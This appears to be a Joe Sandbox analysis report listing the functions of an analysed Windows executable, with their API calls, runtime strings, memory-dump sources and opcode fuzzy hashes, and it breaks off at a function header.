                                                                                                                                                                  Function 00007FF72C9B3130 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 1386471777-1405518554
                                                                                                                                                                  • Opcode ID: de62b78635319d599e7abc9212b61aa2d4140ddebcaf5cc7c9bfc3a8eae7ccac
                                                                                                                                                                  • Instruction ID: e65593551730a5b7559641757a9d43141b80c4c113e358d6c34d26b56ce908b1
                                                                                                                                                                  • Opcode Fuzzy Hash: de62b78635319d599e7abc9212b61aa2d4140ddebcaf5cc7c9bfc3a8eae7ccac
                                                                                                                                                                  • Instruction Fuzzy Hash: 21518C22B09B819AFB20EBB0D8502BC7374FF64758F884135DE8D26A56CF38E556C720
                                                                                                                                                                  Function 00007FF72C9B8CC0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$exists$status
                                                                                                                                                                  • API String ID: 1686256323-596945323
                                                                                                                                                                  • Opcode ID: 0701f3e1eecd133e33545e0bdbcf4b1d469c1f3468a994dfc44bfeb7e812a6a5
                                                                                                                                                                  • Instruction ID: 893338b2d5b27647748bb7b4d81126eb0d7fdda8e393f9a2245d8bab69cf98cf
                                                                                                                                                                  • Opcode Fuzzy Hash: 0701f3e1eecd133e33545e0bdbcf4b1d469c1f3468a994dfc44bfeb7e812a6a5
                                                                                                                                                                  • Instruction Fuzzy Hash: AA41D723F14A459AF700EBB4E8012FCA371EF69768F804632DE5D22AD9EE38D546C750
                                                                                                                                                                  Function 00007FF72C9F812C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F81B1
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F81BF
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F81E9
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F8257
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72C9F83DE,?,?,?,00007FF72C9F80D0,?,?,?,00007FF72C9F4CB1), ref: 00007FF72C9F8263
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                  • Opcode ID: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
                                                                                                                                                                  • Instruction ID: aa6b98354fe377f462866dae191edb6b44a8d2f4b1417153dfc18fdff9f87485
                                                                                                                                                                  • Opcode Fuzzy Hash: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
                                                                                                                                                                  • Instruction Fuzzy Hash: A3310721B1AA8292EE51FB12AC005B4A398FF65BB0FE90534DD9D0B755EF3CF4448B24
                                                                                                                                                                  Function 00007FF72CA17F90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                  • Opcode ID: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
                                                                                                                                                                  • Instruction ID: cca5e2d26a4febac5a0c42df7eb2862367ab0710a7df1ebd6c04541c5c3617a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
                                                                                                                                                                  • Instruction Fuzzy Hash: 6011AC31A18A5186E350AB12BC54B29E2B0FBA8BF4F800234EE5D83B94DF7CD9148B54
                                                                                                                                                                  Function 00007FF72C9FE4B4 Relevance: 9.2, APIs: 6, Instructions: 157COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
                                                                                                                                                                  • Instruction ID: 0d39ed9aca6492f6fd1147c5f9c40916dbc1abc87fc8f7c4cfa2515b459d53e8
                                                                                                                                                                  • Opcode Fuzzy Hash: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C51866290C6C685FB62BF249C503BDBBADDB65B54FD88031C6CC07385DE2DA845CB21
                                                                                                                                                                  Function 00007FF72C9EF3A0 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                  • Opcode ID: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
                                                                                                                                                                  • Instruction ID: 0e00cb7c3440db0d231f7e6e09ef3b2e3e527c618b89e447c1579ed29d32b9ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A31C822A0CAC291FA05BB15EC446B8E361EB747B0F980133EE8D476D5DE7CE4428B24
                                                                                                                                                                  Function 00007FF72CA070FC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA0710B
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA07141
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA0716E
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA0717F
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA07190
                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA071AB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                  • Opcode ID: 47edd497430d51d726a0cc5ad5f266d42e2628c54b0a8713e5ecffabdfc17fb6
                                                                                                                                                                  • Instruction ID: 4c7c7d01e2c821dcabc68913f8da764a537789bad7bac568d0172e77639285ca
                                                                                                                                                                  • Opcode Fuzzy Hash: 47edd497430d51d726a0cc5ad5f266d42e2628c54b0a8713e5ecffabdfc17fb6
                                                                                                                                                                  • Instruction Fuzzy Hash: 57114F20F0964242FA947731BD51A39D172DF64BF0F845734E82E4B6E6DE3CB4418B24
                                                                                                                                                                  Function 00007FF72CA07678 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2718003287-578493202
                                                                                                                                                                  • Opcode ID: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
                                                                                                                                                                  • Instruction ID: fb5ca9a9f33a6cb6f9e1641fbcfaf0e1aa4e0fe2d774179f239bb12ab01c4cdf
                                                                                                                                                                  • Opcode Fuzzy Hash: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
                                                                                                                                                                  • Instruction Fuzzy Hash: BDD11632B08A4589F710DF79E840AAC77B1F7547E8B848235CE5D97B99DE38D106CB50
                                                                                                                                                                  Function 00007FF72C9E99C0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 168COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                                                  • String ID: *L\(&.$assert json failed$in Json::Value::setComment(): Comments must start with /
                                                                                                                                                                  • API String ID: 1944019136-534947926
                                                                                                                                                                  • Opcode ID: dba13caff7750679785259a7afaa3fdb7bffbe462edd1d9bc84e2b1e80cf038b
                                                                                                                                                                  • Instruction ID: 0cc442852659021f2d1012962ee0da01e9f37eb896f21fbe5ce70aa7dc41f853
                                                                                                                                                                  • Opcode Fuzzy Hash: dba13caff7750679785259a7afaa3fdb7bffbe462edd1d9bc84e2b1e80cf038b
                                                                                                                                                                  • Instruction Fuzzy Hash: FB61F722E2CB8192EA10FB11E9503BDA361FBB5790F815132EA9D07796DF7CE590C710
                                                                                                                                                                  Function 00007FF72C9B8880 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                  • API String ID: 3668304517-1877168627
                                                                                                                                                                  • Opcode ID: 2e8f2559c6d64fd90fad7909c87f0418443287e65ef9d49de0830800ee52c4ec
                                                                                                                                                                  • Instruction ID: 19012004e40f6d2aa581a54b660141365c401f48fb22154d46f44ab6890d9659
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e8f2559c6d64fd90fad7909c87f0418443287e65ef9d49de0830800ee52c4ec
                                                                                                                                                                  • Instruction Fuzzy Hash: A7519032A08B8196EB10EF24E8903A9B7A0FB94B54F908436DB8D47B69DF3CD545CF50
                                                                                                                                                                  Function 00007FF72C9B2E20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 2967684691-1405518554
                                                                                                                                                                  • Opcode ID: 0e3883f88e969cb25580450e773a97becdcbad1f91c0857f89cef128bd5386c8
                                                                                                                                                                  • Instruction ID: dbf654757f49495111db73757455e110caf816bdd1b9b909692b7fa849345e95
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e3883f88e969cb25580450e773a97becdcbad1f91c0857f89cef128bd5386c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F418022B09B81DAFB20EBB0D8502BC7364EF60758F884035DE8D26A95DF38D516D764
                                                                                                                                                                  Function 00007FF72C9F3938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2933794660-578493202
                                                                                                                                                                  • Opcode ID: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
                                                                                                                                                                  • Instruction ID: 0c013ffe891629af4c54ae2c66da7a52f15dbe6d8817449ac7547d1f82b54a92
                                                                                                                                                                  • Opcode Fuzzy Hash: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
                                                                                                                                                                  • Instruction Fuzzy Hash: F6114F32B14B018AEB00DB60EC556A873B4F769768F440E31EA6D46764DF78D1548750
                                                                                                                                                                  Function 00007FF72C9F875C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                  • Opcode ID: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
                                                                                                                                                                  • Instruction ID: 9d04066f94fbdb546c7c55b3994fef54efc3aa20971f3c356c48493ae0fb2d2f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
                                                                                                                                                                  • Instruction Fuzzy Hash: 7AF0C83160975242EA50AB10FC457399335FF65B70FD40235C66D455F8DF2CD048CB60
                                                                                                                                                                  Function 00007FF72C9F50D0 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                  • Opcode ID: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
                                                                                                                                                                  • Instruction ID: 49065a33d5adfa134380970def462e345cb7918d3c4330b437f1742ec4ad5c5c
                                                                                                                                                                  • Opcode Fuzzy Hash: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
                                                                                                                                                                  • Instruction Fuzzy Hash: 17B10521E0E68681EA75FB159C40678E398EF64BA0F898535DECD07789DF7CE442CB60
                                                                                                                                                                  Function 00007FF72CA0E990 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                  • Opcode ID: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
                                                                                                                                                                  • Instruction ID: a123f77a1143be8ba913291f91c7f124f5dcff57730a012d34b64179acdcdcb2
                                                                                                                                                                  • Opcode Fuzzy Hash: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
                                                                                                                                                                  • Instruction Fuzzy Hash: 83116322E6CE9701F65431B8FC53B75D460EFB93F4EC50734E6EE162D68E6C5840AA20
                                                                                                                                                                  Function 00007FF72CA071C4 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
